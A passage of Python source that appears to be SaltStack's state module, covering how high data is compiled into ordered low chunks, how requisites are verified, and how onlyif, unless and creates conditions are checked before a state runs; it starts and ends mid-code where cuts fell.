"reload_modules",
"reload_grains",
"reload_pillar",
"runas",
"runas_password",
"fire_event",
"saltenv",
"use",
"use_in",
"__env__",
"__sls__",
"__id__",
"__orchestration_jid__",
"__pub_user",
"__pub_arg",
"__pub_jid",
"__pub_fun",
"__pub_tgt",
"__pub_ret",
"__pub_pid",
"__pub_tgt_type",
"__prereq__",
"__prerequired__",
]
)
STATE_INTERNAL_KEYWORDS = STATE_REQUISITE_KEYWORDS.union(
STATE_REQUISITE_IN_KEYWORDS
).union(STATE_RUNTIME_KEYWORDS)
def _odict_hashable(self):
return id(self)
OrderedDict.__hash__ = _odict_hashable
def split_low_tag(tag):
"""
Take a low tag and split it back into the low dict that it came from
"""
state, id_, name, fun = tag.split("_|-")
return {"state": state, "__id__": id_, "name": name, "fun": fun}
def _gen_tag(low):
"""
Generate the running dict tag string from the low data structure
"""
return "{0[state]}_|-{0[__id__]}_|-{0[name]}_|-{0[fun]}".format(low)
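# Round-trip sketch (illustrative values):
#   _gen_tag({"state": "file", "__id__": "apache",
#             "name": "/etc/httpd/httpd.conf", "fun": "managed"})
# yields "file_|-apache_|-/etc/httpd/httpd.conf_|-managed", and split_low_tag
# turns that tag back into the same low dict.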
def _clean_tag(tag):
"""
Make tag name safe for filenames
"""
return salt.utils.files.safe_filename_leaf(tag)
def _l_tag(name, id_):
low = {
"name": "listen_{}".format(name),
"__id__": "listen_{}".format(id_),
"state": "Listen_Error",
"fun": "Listen_Error",
}
return _gen_tag(low)
def _calculate_fake_duration():
"""
Generate a NULL duration for when states do not run
but we want the results to be consistent.
"""
utc_start_time = datetime.datetime.utcnow()
local_start_time = utc_start_time - (
datetime.datetime.utcnow() - datetime.datetime.now()
)
utc_finish_time = datetime.datetime.utcnow()
start_time = local_start_time.time().isoformat()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
return start_time, duration
def get_accumulator_dir(cachedir):
"""
Return the directory that accumulator data is stored in, creating it if it
doesn't exist.
"""
fn_ = os.path.join(cachedir, "accumulator")
if not os.path.isdir(fn_):
# accumulator_dir is not present, create it
os.makedirs(fn_)
return fn_
def trim_req(req):
"""
Trim any function off of a requisite
"""
reqfirst = next(iter(req))
if "." in reqfirst:
return {reqfirst.split(".")[0]: req[reqfirst]}
return req
def state_args(id_, state, high):
"""
Return a set of the arguments passed to the named state
"""
args = set()
if id_ not in high:
return args
if state not in high[id_]:
return args
for item in high[id_][state]:
if not isinstance(item, dict):
continue
if len(item) != 1:
continue
args.add(next(iter(item)))
return args
def find_name(name, state, high):
"""
    Scan high data for the id referencing the given name and return a list of (id, state) tuples that match
Note: if `state` is sls, then we are looking for all IDs that match the given SLS
"""
ext_id = []
if name in high:
ext_id.append((name, state))
# if we are requiring an entire SLS, then we need to add ourselves to everything in that SLS
elif state == "sls":
for nid, item in high.items():
if item["__sls__"] == name:
ext_id.append((nid, next(iter(item))))
# otherwise we are requiring a single state, lets find it
else:
# We need to scan for the name
for nid in high:
if state in high[nid]:
if isinstance(high[nid][state], list):
for arg in high[nid][state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if arg[next(iter(arg))] == name:
ext_id.append((nid, state))
return ext_id
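# Example (illustrative high data): with
#   high = {"vim": {"pkg": ["installed"], "__sls__": "edit"}}
# find_name("vim", "pkg", high) returns [("vim", "pkg")], and
# find_name("edit", "sls", high) matches every ID whose __sls__ is "edit".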
def find_sls_ids(sls, high):
"""
    Scan for all ids in the given sls and return them as a list of (id, state) tuples
"""
ret = []
for nid, item in high.items():
try:
sls_tgt = item["__sls__"]
except TypeError:
if nid != "__exclude__":
log.error(
"Invalid non-dict item '%s' in high data. Value: %r", nid, item
)
continue
else:
if sls_tgt == sls:
for st_ in item:
if st_.startswith("__"):
continue
ret.append((nid, st_))
return ret
def format_log(ret):
"""
Format the state into a log message
"""
msg = ""
if isinstance(ret, dict):
# Looks like the ret may be a valid state return
if "changes" in ret:
# Yep, looks like a valid state return
chg = ret["changes"]
if not chg:
if ret["comment"]:
msg = ret["comment"]
else:
msg = "No changes made for {0[name]}".format(ret)
elif isinstance(chg, dict):
if "diff" in chg:
if isinstance(chg["diff"], str):
msg = "File changed:\n{}".format(chg["diff"])
if all([isinstance(x, dict) for x in chg.values()]):
if all([("old" in x and "new" in x) for x in chg.values()]):
msg = "Made the following changes:\n"
for pkg in chg:
old = chg[pkg]["old"]
if not old and old not in (False, None):
old = "absent"
new = chg[pkg]["new"]
if not new and new not in (False, None):
new = "absent"
# This must be able to handle unicode as some package names contain
# non-ascii characters like "Français" or "Español". See Issue #33605.
msg += "'{}' changed from '{}' to '{}'\n".format(
pkg, old, new
)
if not msg:
msg = str(ret["changes"])
if ret["result"] is True or ret["result"] is None:
log.info(msg)
else:
log.error(msg)
else:
# catch unhandled data
log.info(str(ret))
def master_compile(master_opts, minion_opts, grains, id_, saltenv):
"""
Compile the master side low state data, and build the hidden state file
"""
st_ = MasterHighState(master_opts, minion_opts, grains, id_, saltenv)
return st_.compile_highstate()
def ishashable(obj):
try:
hash(obj)
except TypeError:
return False
return True
def mock_ret(cdata):
"""
Returns a mocked return dict with information about the run, without
executing the state function
"""
# As this is expanded it should be sent into the execution module
# layer or it should be turned into a standalone loader system
if cdata["args"]:
name = cdata["args"][0]
else:
name = cdata["kwargs"]["name"]
return {
"name": name,
"comment": "Not called, mocked",
"changes": {},
"result": True,
}
class StateError(Exception):
"""
Custom exception class.
"""
class Compiler:
"""
Class used to compile and manage the High Data structure
"""
def __init__(self, opts, renderers):
self.opts = opts
self.rend = renderers
def render_template(self, template, **kwargs):
"""
Enforce the states in a template
"""
high = compile_template(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
**kwargs
)
if not high:
return high
return self.pad_funcs(high)
def pad_funcs(self, high):
"""
Turns dot delimited function refs into function strings
"""
for name in high:
if not isinstance(high[name], dict):
if isinstance(high[name], str):
                    # Is this a short state? It needs to be padded!
if "." in high[name]:
comps = high[name].split(".")
if len(comps) >= 2:
# Merge the comps
comps[1] = ".".join(comps[1 : len(comps)])
high[name] = {
# '__sls__': template,
# '__env__': None,
comps[0]: [comps[1]]
}
continue
continue
skeys = set()
for key in sorted(high[name]):
if key.startswith("_"):
continue
if not isinstance(high[name][key], list):
continue
if "." in key:
comps = key.split(".")
if len(comps) >= 2:
# Merge the comps
comps[1] = ".".join(comps[1 : len(comps)])
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
continue
high[name][comps[0]] = high[name].pop(key)
high[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
return high
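    # For example (illustrative data), pad_funcs turns the short state
    #   {"vim": "pkg.installed"}
    # into {"vim": {"pkg": ["installed"]}}, and a dotted key such as
    # "file.managed" under an ID is split so the function name ("managed")
    # is appended to that state's argument list under the "file" key.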
def verify_high(self, high):
"""
Verify that the high data is viable and follows the data structure
"""
errors = []
if not isinstance(high, dict):
errors.append("High data is not a dictionary and is invalid")
reqs = OrderedDict()
for name, body in high.items():
if name.startswith("__"):
continue
if not isinstance(name, str):
errors.append(
"ID '{}' in SLS '{}' is not formed as a string, but "
"is a {}".format(name, body["__sls__"], type(name).__name__)
)
if not isinstance(body, dict):
err = "The type {} in {} is not formatted as a dictionary".format(
name, body
)
errors.append(err)
continue
for state in body:
if state.startswith("__"):
continue
if not isinstance(body[state], list):
errors.append(
"State '{}' in SLS '{}' is not formed as a list".format(
name, body["__sls__"]
)
)
else:
fun = 0
if "." in state:
fun += 1
for arg in body[state]:
if isinstance(arg, str):
fun += 1
if " " in arg.strip():
errors.append(
(
'The function "{}" in state '
'"{}" in SLS "{}" has '
"whitespace, a function with whitespace is "
"not supported, perhaps this is an argument "
'that is missing a ":"'
).format(arg, name, body["__sls__"])
)
elif isinstance(arg, dict):
# The arg is a dict, if the arg is require or
# watch, it must be a list.
#
# Add the requires to the reqs dict and check them
# all for recursive requisites.
argfirst = next(iter(arg))
if argfirst in ("require", "watch", "prereq", "onchanges"):
if not isinstance(arg[argfirst], list):
errors.append(
(
"The {}"
" statement in state '{}' in SLS '{}' "
"needs to be formed as a list"
).format(argfirst, name, body["__sls__"])
)
# It is a list, verify that the members of the
# list are all single key dicts.
else:
reqs[name] = {"state": state}
for req in arg[argfirst]:
if isinstance(req, str):
req = {"id": req}
if not isinstance(req, dict):
err = (
"Requisite declaration {}"
" in SLS {} is not formed as a"
" single key dictionary"
).format(req, body["__sls__"])
errors.append(err)
continue
req_key = next(iter(req))
req_val = req[req_key]
if "." in req_key:
errors.append(
"Invalid requisite type '{}' "
"in state '{}', in SLS "
"'{}'. Requisite types must "
"not contain dots, did you "
"mean '{}'?".format(
req_key,
name,
body["__sls__"],
req_key[: req_key.find(".")],
)
)
if not ishashable(req_val):
errors.append(
(
'Illegal requisite "{}", '
"is SLS {}\n"
).format(
str(req_val), body["__sls__"],
)
)
continue
# Check for global recursive requisites
reqs[name][req_val] = req_key
# I am going beyond 80 chars on
# purpose, this is just too much
# of a pain to deal with otherwise
if req_val in reqs:
if name in reqs[req_val]:
if reqs[req_val][name] == state:
if (
reqs[req_val]["state"]
== reqs[name][req_val]
):
err = (
"A recursive "
"requisite was found, SLS "
'"{}" ID "{}" ID "{}"'
).format(
body["__sls__"],
name,
req_val,
)
errors.append(err)
# Make sure that there is only one key in the
# dict
if len(list(arg)) != 1:
errors.append(
(
"Multiple dictionaries "
"defined in argument of state '{}' in SLS"
" '{}'"
).format(name, body["__sls__"])
)
if not fun:
if state == "require" or state == "watch":
continue
errors.append(
(
"No function declared in state '{}' in" " SLS '{}'"
).format(state, body["__sls__"])
)
elif fun > 1:
errors.append(
"Too many functions declared in state '{}' in "
"SLS '{}'".format(state, body["__sls__"])
)
return errors
def order_chunks(self, chunks):
"""
Sort the chunk list verifying that the chunks follow the order
specified in the order options.
"""
cap = 1
for chunk in chunks:
if "order" in chunk:
if not isinstance(chunk["order"], int):
continue
chunk_order = chunk["order"]
if chunk_order > cap - 1 and chunk_order > 0:
cap = chunk_order + 100
for chunk in chunks:
if "order" not in chunk:
chunk["order"] = cap
continue
if not isinstance(chunk["order"], (int, float)):
if chunk["order"] == "last":
chunk["order"] = cap + 1000000
elif chunk["order"] == "first":
chunk["order"] = 0
else:
chunk["order"] = cap
if "name_order" in chunk:
chunk["order"] = chunk["order"] + chunk.pop("name_order") / 10000.0
if chunk["order"] < 0:
chunk["order"] = cap + 1000000 + chunk["order"]
chunk["name"] = salt.utils.data.decode(chunk["name"])
chunks.sort(
key=lambda chunk: (
chunk["order"],
"{0[state]}{0[name]}{0[fun]}".format(chunk),
)
)
return chunks
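    # Ordering sketch (illustrative chunks): an explicit "order: 1" raises the
    # cap to 101, so any chunk without an order is placed after it at 101;
    # "order: last" maps to cap + 1000000, "order: first" to 0, and a
    # "name_order" of N adds N / 10000.0 so names keep their declared order.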
def compile_high_data(self, high):
"""
"Compile" the high data as it is retrieved from the CLI or YAML into
the individual state executor structures
"""
chunks = []
for name, body in high.items():
if name.startswith("__"):
continue
for state, run in body.items():
funcs = set()
names = []
if state.startswith("__"):
continue
chunk = {"state": state, "name": name}
if "__sls__" in body:
chunk["__sls__"] = body["__sls__"]
if "__env__" in body:
chunk["__env__"] = body["__env__"]
chunk["__id__"] = name
for arg in run:
if isinstance(arg, str):
funcs.add(arg)
continue
if isinstance(arg, dict):
for key, val in arg.items():
if key == "names":
for _name in val:
if _name not in names:
names.append(_name)
continue
else:
chunk.update(arg)
if names:
name_order = 1
for entry in names:
live = copy.deepcopy(chunk)
if isinstance(entry, dict):
low_name = next(iter(entry.keys()))
live["name"] = low_name
list(map(live.update, entry[low_name]))
else:
live["name"] = entry
live["name_order"] = name_order
name_order = name_order + 1
for fun in funcs:
live["fun"] = fun
chunks.append(live)
else:
live = copy.deepcopy(chunk)
for fun in funcs:
live["fun"] = fun
chunks.append(live)
chunks = self.order_chunks(chunks)
return chunks
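    # For example (illustrative high data),
    #   {"vim": {"pkg": ["installed", {"refresh": True}],
    #            "__sls__": "edit", "__env__": "base"}}
    # compiles to a single low chunk roughly like
    #   {"state": "pkg", "__id__": "vim", "name": "vim", "fun": "installed",
    #    "refresh": True, "__sls__": "edit", "__env__": "base", "order": 1}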
def apply_exclude(self, high):
"""
Read in the __exclude__ list and remove all excluded objects from the
high data
"""
if "__exclude__" not in high:
return high
ex_sls = set()
ex_id = set()
exclude = high.pop("__exclude__")
for exc in exclude:
if isinstance(exc, str):
# The exclude statement is a string, assume it is an sls
ex_sls.add(exc)
if isinstance(exc, dict):
# Explicitly declared exclude
if len(exc) != 1:
continue
key = next(iter(exc.keys()))
if key == "sls":
ex_sls.add(exc["sls"])
elif key == "id":
ex_id.add(exc["id"])
# Now the excludes have been simplified, use them
if ex_sls:
            # There are sls excludes, find the associated ids
for name, body in high.items():
if name.startswith("__"):
continue
if body.get("__sls__", "") in ex_sls:
ex_id.add(name)
for id_ in ex_id:
if id_ in high:
high.pop(id_)
return high
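    # The __exclude__ list accepts plain SLS names or explicit dicts, e.g.
    # (illustrative): ["webserver", {"sls": "database"}, {"id": "/etc/vimrc"}]
    # - a bare string or {"sls": ...} drops every ID whose __sls__ matches,
    # - {"id": ...} drops that single ID from the high data.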
class State:
"""
Class used to execute salt states
"""
def __init__(
self,
opts,
pillar_override=None,
jid=None,
pillar_enc=None,
proxy=None,
context=None,
mocked=False,
loader="states",
initial_pillar=None,
):
self.states_loader = loader
if "grains" not in opts:
opts["grains"] = salt.loader.grains(opts)
self.opts = opts
self.proxy = proxy
self._pillar_override = pillar_override
if pillar_enc is not None:
try:
pillar_enc = pillar_enc.lower()
except AttributeError:
pillar_enc = str(pillar_enc).lower()
self._pillar_enc = pillar_enc
log.debug("Gathering pillar data for state run")
if initial_pillar and not self._pillar_override:
self.opts["pillar"] = initial_pillar
else:
# Compile pillar data
self.opts["pillar"] = self._gather_pillar()
# Reapply overrides on top of compiled pillar
if self._pillar_override:
self.opts["pillar"] = salt.utils.dictupdate.merge(
self.opts["pillar"],
self._pillar_override,
self.opts.get("pillar_source_merging_strategy", "smart"),
self.opts.get("renderer", "yaml"),
self.opts.get("pillar_merge_lists", False),
)
log.debug("Finished gathering pillar data for state run")
self.state_con = context or {}
self.load_modules()
self.active = set()
self.mod_init = set()
self.pre = {}
self.__run_num = 0
self.jid = jid
self.instance_id = str(id(self))
self.inject_globals = {}
self.mocked = mocked
def _gather_pillar(self):
"""
Whenever a state run starts, gather the pillar data fresh
"""
if self._pillar_override:
if self._pillar_enc:
try:
self._pillar_override = salt.utils.crypt.decrypt(
self._pillar_override,
self._pillar_enc,
translate_newlines=True,
renderers=getattr(self, "rend", None),
opts=self.opts,
valid_rend=self.opts["decrypt_pillar_renderers"],
)
except Exception as exc: # pylint: disable=broad-except
log.error("Failed to decrypt pillar override: %s", exc)
if isinstance(self._pillar_override, str):
# This can happen if an entire pillar dictionary was passed as
# a single encrypted string. The override will have been
# decrypted above, and should now be a stringified dictionary.
# Use the YAML loader to convert that to a Python dictionary.
try:
self._pillar_override = yamlloader.load(
self._pillar_override, Loader=yamlloader.SaltYamlSafeLoader
)
except Exception as exc: # pylint: disable=broad-except
log.error("Failed to load CLI pillar override")
log.exception(exc)
if not isinstance(self._pillar_override, dict):
log.error("Pillar override was not passed as a dictionary")
self._pillar_override = None
pillar = salt.pillar.get_pillar(
self.opts,
self.opts["grains"],
self.opts["id"],
self.opts["saltenv"],
pillar_override=self._pillar_override,
pillarenv=self.opts.get("pillarenv"),
)
return pillar.compile_pillar()
def _mod_init(self, low):
"""
Check the module initialization function, if this is the first run
of a state package that has a mod_init function, then execute the
mod_init function in the state module.
"""
# ensure that the module is loaded
try:
self.states[
"{}.{}".format(low["state"], low["fun"])
] # pylint: disable=W0106
except KeyError:
return
minit = "{}.mod_init".format(low["state"])
if low["state"] not in self.mod_init:
if minit in self.states._dict:
mret = self.states[minit](low)
if not mret:
return
self.mod_init.add(low["state"])
def _mod_aggregate(self, low, running, chunks):
"""
        Execute the aggregation systems to modify the low chunk at runtime
"""
agg_opt = self.functions["config.option"]("state_aggregate")
if "aggregate" in low:
agg_opt = low["aggregate"]
if agg_opt is True:
agg_opt = [low["state"]]
elif not isinstance(agg_opt, list):
return low
if low["state"] in agg_opt and not low.get("__agg__"):
agg_fun = "{}.mod_aggregate".format(low["state"])
if agg_fun in self.states:
try:
low = self.states[agg_fun](low, chunks, running)
low["__agg__"] = True
except TypeError:
log.error("Failed to execute aggregate for state %s", low["state"])
return low
def _run_check(self, low_data):
"""
        Evaluate the onlyif, unless, and creates conditions to determine whether the state should run.
"""
ret = {"result": False, "comment": []}
cmd_opts = {}
# Set arguments from cmd.run state as appropriate
POSSIBLE_CMD_ARGS = (
"cwd",
"root",
"runas",
"env",
"prepend_path",
"umask",
"timeout",
"success_retcodes",
)
for run_cmd_arg in POSSIBLE_CMD_ARGS:
cmd_opts[run_cmd_arg] = low_data.get(run_cmd_arg)
if "shell" in low_data:
cmd_opts["shell"] = low_data["shell"]
elif "shell" in self.opts["grains"]:
cmd_opts["shell"] = self.opts["grains"].get("shell")
if "onlyif" in low_data:
_ret = self._run_check_onlyif(low_data, cmd_opts)
ret["result"] = _ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
ret["skip_watch"] = _ret["skip_watch"]
if "unless" in low_data:
_ret = self._run_check_unless(low_data, cmd_opts)
# If either result is True, the returned result should be True
ret["result"] = _ret["result"] or ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
# If either result is True, the returned result should be True
ret["skip_watch"] = _ret["skip_watch"] or ret["skip_watch"]
if "creates" in low_data:
_ret = self._run_check_creates(low_data)
ret["result"] = _ret["result"] or ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
# If either result is True, the returned result should be True
ret["skip_watch"] = _ret["skip_watch"] or ret["skip_watch"]
return ret
def _run_check_function(self, entry):
"""Format slot args and run unless/onlyif function."""
fun = entry.pop("fun")
args = entry.pop("args") if "args" in entry else []
cdata = {"args": args, "kwargs": entry}
self.format_slots(cdata)
return self.functions[fun](*cdata["args"], **cdata["kwargs"])
def _run_check_onlyif(self, low_data, cmd_opts):
"""
        Check that the onlyif conditions return 0; if any does not, the state is skipped.
"""
ret = {"result": False}
if not isinstance(low_data["onlyif"], list):
low_data_onlyif = [low_data["onlyif"]]
else:
low_data_onlyif = low_data["onlyif"]
def _check_cmd(cmd):
if cmd != 0 and ret["result"] is False:
ret.update(
{
"comment": "onlyif condition is false",
"skip_watch": True,
"result": True,
}
)
elif cmd == 0:
ret.update({"comment": "onlyif condition is true", "result": False})
for entry in low_data_onlyif:
if isinstance(entry, str):
try:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
except CommandExecutionError:
# Command failed, notify onlyif to skip running the item
cmd = 100
log.debug("Last command return code: %s", cmd)
_check_cmd(cmd)
elif isinstance(entry, dict):
if "fun" not in entry:
ret["comment"] = "no `fun` argument in onlyif: {}".format(entry)
log.warning(ret["comment"])
return ret
get_return = entry.pop("get_return", None)
result = self._run_check_function(entry)
if get_return:
result = salt.utils.data.traverse_dict_and_list(result, get_return)
if self.state_con.get("retcode", 0):
_check_cmd(self.state_con["retcode"])
elif not result:
ret.update(
{
"comment": "onlyif condition is false",
"skip_watch": True,
"result": True,
}
)
else:
ret.update({"comment": "onlyif condition is true", "result": False})
else:
ret.update(
{
"comment": "onlyif execution failed, bad type passed",
"result": False,
}
)
return ret
def _run_check_unless(self, low_data, cmd_opts):
"""
        Check that the unless conditions do not return 0; if any returns 0, the state is skipped.
"""
ret = {"result": False}
if not isinstance(low_data["unless"], list):
low_data_unless = [low_data["unless"]]
else:
low_data_unless = low_data["unless"]
def _check_cmd(cmd):
if cmd == 0 and ret["result"] is False:
ret.update(
{
"comment": "unless condition is true",
"skip_watch": True,
"result": True,
}
)
elif cmd != 0:
ret.update({"comment": "unless condition is false", "result": False})
for entry in low_data_unless:
if isinstance(entry, str):
try:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
log.debug("Last command return code: %s", cmd)
except CommandExecutionError:
# Command failed, so notify unless to skip the item
cmd = 0
_check_cmd(cmd)
elif isinstance(entry, dict):
if "fun" not in entry:
ret["comment"] = "no `fun` argument in unless: {}".format(entry)
log.warning(ret["comment"])
return ret
get_return = entry.pop("get_return", None)
result = self._run_check_function(entry)
if get_return:
result = salt.utils.data.traverse_dict_and_list(result, get_return)
if self.state_con.get("retcode", 0):
_check_cmd(self.state_con["retcode"])
elif result:
ret.update(
{
"comment": "unless condition is true",
"skip_watch": True,
"result": True,
}
)
else:
ret.update(
{"comment": "unless condition is false", "result": False}
)
else:
ret.update(
{
"comment": "unless condition is false, bad type passed",
"result": False,
}
)
# No reason to stop, return ret
return ret
def _run_check_cmd(self, low_data):
"""
Alter the way a successful state run is determined
"""
ret = {"result": False}
cmd_opts = {}
if "shell" in self.opts["grains"]:
cmd_opts["shell"] = self.opts["grains"].get("shell")
for entry in low_data["check_cmd"]:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
log.debug("Last command return code: %s", cmd)
if cmd == 0 and ret["result"] is False:
ret.update(
{
"comment": "check_cmd determined the state succeeded",
"result": True,
}
)
elif cmd != 0:
ret.update(
{
"comment": "check_cmd determined the state failed",
"result": False,
}
)
return ret
return ret
def _run_check_creates(self, low_data):
"""
Check that listed files exist
"""
ret = {"result": False}
if isinstance(low_data["creates"], str) and os.path.exists(low_data["creates"]):
ret["comment"] = "{} exists".format(low_data["creates"])
ret["result"] = True
ret["skip_watch"] = True
elif isinstance(low_data["creates"], list) and all(
[os.path.exists(path) for path in low_data["creates"]]
):
ret["comment"] = "All files in creates exist"
ret["result"] = True
ret["skip_watch"] = True
else:
ret["comment"] = "Creates files not found"
ret["result"] = False
return ret
def reset_run_num(self):
"""
        Reset the run_num value to 0
"""
self.__run_num = 0
def _load_states(self):
"""
        Read the state loader value and load up the correct states subsystem
"""
if self.states_loader == "thorium":
self.states = salt.loader.thorium(
self.opts, self.functions, {}
) # TODO: Add runners, proxy?
else:
self.states = salt.loader.states(
self.opts,
self.functions,
self.utils,
self.serializers,
context=self.state_con,
proxy=self.proxy,
)
def load_modules(self, data=None, proxy=None):
"""
Load the modules into the state
"""
log.info("Loading fresh modules for state activity")
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts, self.state_con, utils=self.utils, proxy=self.proxy
)
if isinstance(data, dict):
if data.get("provider", False):
if isinstance(data["provider"], str):
providers = [{data["state"]: data["provider"]}]
elif isinstance(data["provider"], list):
providers = data["provider"]
else:
providers = {}
for provider in providers:
for mod in provider:
funcs = salt.loader.raw_mod(
self.opts, provider[mod], self.functions
)
if funcs:
for func in funcs:
f_key = "{}{}".format(mod, func[func.rindex(".") :])
self.functions[f_key] = funcs[func]
self.serializers = salt.loader.serializers(self.opts)
self._load_states()
self.rend = salt.loader.render(
self.opts,
self.functions,
states=self.states,
proxy=self.proxy,
context=self.state_con,
)
def module_refresh(self):
"""
Refresh all the modules
"""
log.debug("Refreshing modules...")
if self.opts["grains"].get("os") != "MacOS":
# In case a package has been installed into the current python
# process 'site-packages', the 'site' module needs to be reloaded in
# order for the newly installed package to be importable.
try:
reload_module(site)
except RuntimeError:
log.error(
"Error encountered during module reload. Modules were not reloaded."
)
except TypeError:
log.error(
"Error encountered during module reload. Modules were not reloaded."
)
self.load_modules()
if not self.opts.get("local", False) and self.opts.get("multiprocessing", True):
self.functions["saltutil.refresh_modules"]()
def check_refresh(self, data, ret):
"""
        Check to see if the modules for this state instance need to be updated.
        Only update if the state is a file or a package and if it changed
        something. If the file function is managed, check to see if the file is
        a possible module type, e.g. a .py, .pyx, or .so file. Always refresh
        if the function is recurse, since that can lay down anything.
"""
_reload_modules = False
if data.get("reload_grains", False):
log.debug("Refreshing grains...")
self.opts["grains"] = salt.loader.grains(self.opts)
_reload_modules = True
if data.get("reload_pillar", False):
log.debug("Refreshing pillar...")
self.opts["pillar"] = self._gather_pillar()
_reload_modules = True
if not ret["changes"]:
if data.get("force_reload_modules", False):
self.module_refresh()
return
if data.get("reload_modules", False) or _reload_modules:
# User explicitly requests a reload
self.module_refresh()
return
if data["state"] == "file":
if data["fun"] == "managed":
if data["name"].endswith((".py", ".pyx", ".pyo", ".pyc", ".so")):
self.module_refresh()
elif data["fun"] == "recurse":
self.module_refresh()
elif data["fun"] == "symlink":
if "bin" in data["name"]:
self.module_refresh()
elif data["state"] in ("pkg", "ports", "pip"):
self.module_refresh()
def verify_data(self, data):
"""
Verify the data, return an error statement if something is wrong
"""
errors = []
if "state" not in data:
errors.append('Missing "state" data')
if "fun" not in data:
errors.append('Missing "fun" data')
if "name" not in data:
errors.append('Missing "name" data')
if data["name"] and not isinstance(data["name"], str):
errors.append(
"ID '{}' {}is not formed as a string, but is a {}".format(
data["name"],
"in SLS '{}' ".format(data["__sls__"]) if "__sls__" in data else "",
type(data["name"]).__name__,
)
)
if errors:
return errors
full = data["state"] + "." + data["fun"]
if full not in self.states:
if "__sls__" in data:
errors.append(
"State '{}' was not found in SLS '{}'".format(full, data["__sls__"])
)
reason = self.states.missing_fun_string(full)
if reason:
errors.append("Reason: {}".format(reason))
else:
errors.append("Specified state '{}' was not found".format(full))
else:
# First verify that the parameters are met
aspec = salt.utils.args.get_function_argspec(self.states[full])
arglen = 0
deflen = 0
if isinstance(aspec.args, list):
arglen = len(aspec.args)
if isinstance(aspec.defaults, tuple):
deflen = len(aspec.defaults)
for ind in range(arglen - deflen):
if aspec.args[ind] not in data:
errors.append(
"Missing parameter {} for state {}".format(
aspec.args[ind], full
)
)
# If this chunk has a recursive require, then it will cause a
# recursive loop when executing, check for it
reqdec = ""
if "require" in data:
reqdec = "require"
if "watch" in data:
            # Check to see if the state has a mod_watch function; if it does
            # not, extend the require statement with the contents of watch so
            # that the mod_watch function is not called and the requisite
            # capability is still used
if "{}.mod_watch".format(data["state"]) not in self.states:
if "require" in data:
data["require"].extend(data.pop("watch"))
else:
data["require"] = data.pop("watch")
reqdec = "require"
else:
reqdec = "watch"
if reqdec:
for req in data[reqdec]:
reqfirst = next(iter(req))
if data["state"] == reqfirst:
if fnmatch.fnmatch(data["name"], req[reqfirst]) or fnmatch.fnmatch(
data["__id__"], req[reqfirst]
):
err = (
"Recursive require detected in SLS {} for"
" require {} in ID {}"
).format(data["__sls__"], req, data["__id__"])
errors.append(err)
return errors
def verify_high(self, high):
"""
Verify that the high data is viable and follows the data structure
"""
errors = []
if not isinstance(high, dict):
errors.append("High data is not a dictionary and is invalid")
reqs = OrderedDict()
for name, body in high.items():
try:
if name.startswith("__"):
continue
except AttributeError:
pass
if not isinstance(name, str):
errors.append(
"ID '{}' in SLS '{}' is not formed as a string, but "
"is a {}. It may need to be quoted.".format(
name, body["__sls__"], type(name).__name__
)
)
if not isinstance(body, dict):
err = "The type {} in {} is not formatted as a dictionary".format(
name, body
)
errors.append(err)
continue
for state in body:
if state.startswith("__"):
continue
if body[state] is None:
errors.append(
"ID '{}' in SLS '{}' contains a short declaration "
"({}) with a trailing colon. When not passing any "
"arguments to a state, the colon must be omitted.".format(
name, body["__sls__"], state
)
)
continue
if not isinstance(body[state], list):
errors.append(
"State '{}' in SLS '{}' is not formed as a list".format(
name, body["__sls__"]
)
)
else:
fun = 0
if "." in state:
fun += 1
for arg in body[state]:
if isinstance(arg, str):
fun += 1
if " " in arg.strip():
errors.append(
(
'The function "{}" in state '
'"{}" in SLS "{}" has '
"whitespace, a function with whitespace is "
"not supported, perhaps this is an argument "
'that is missing a ":"'
).format(arg, name, body["__sls__"])
)
elif isinstance(arg, dict):
# The arg is a dict, if the arg is require or
# watch, it must be a list.
#
# Add the requires to the reqs dict and check them
# all for recursive requisites.
argfirst = next(iter(arg))
if argfirst == "names":
if not isinstance(arg[argfirst], list):
errors.append(
"The 'names' argument in state "
"'{}' in SLS '{}' needs to be "
"formed as a list".format(name, body["__sls__"])
)
if argfirst in ("require", "watch", "prereq", "onchanges"):
if not isinstance(arg[argfirst], list):
errors.append(
"The {} statement in state '{}' in "
"SLS '{}' needs to be formed as a "
"list".format(argfirst, name, body["__sls__"])
)
# It is a list, verify that the members of the
# list are all single key dicts.
else:
reqs[name] = OrderedDict(state=state)
for req in arg[argfirst]:
if isinstance(req, str):
req = {"id": req}
if not isinstance(req, dict):
err = (
"Requisite declaration {}"
" in SLS {} is not formed as a"
" single key dictionary"
).format(req, body["__sls__"])
errors.append(err)
continue
req_key = next(iter(req))
req_val = req[req_key]
if "." in req_key:
errors.append(
"Invalid requisite type '{}' "
"in state '{}', in SLS "
"'{}'. Requisite types must "
"not contain dots, did you "
"mean '{}'?".format(
req_key,
name,
body["__sls__"],
req_key[: req_key.find(".")],
)
)
if not ishashable(req_val):
errors.append(
(
'Illegal requisite "{}", '
"please check your syntax.\n"
).format(req_val)
)
continue
# Check for global recursive requisites
reqs[name][req_val] = req_key
# I am going beyond 80 chars on
# purpose, this is just too much
# of a pain to deal with otherwise
if req_val in reqs:
if name in reqs[req_val]:
if reqs[req_val][name] == state:
if (
reqs[req_val]["state"]
== reqs[name][req_val]
):
err = (
"A recursive "
"requisite was found, SLS "
'"{}" ID "{}" ID "{}"'
).format(
body["__sls__"],
name,
req_val,
)
errors.append(err)
# Make sure that there is only one key in the
# dict
if len(list(arg)) != 1:
errors.append(
"Multiple dictionaries defined in "
"argument of state '{}' in SLS '{}'".format(
name, body["__sls__"]
)
)
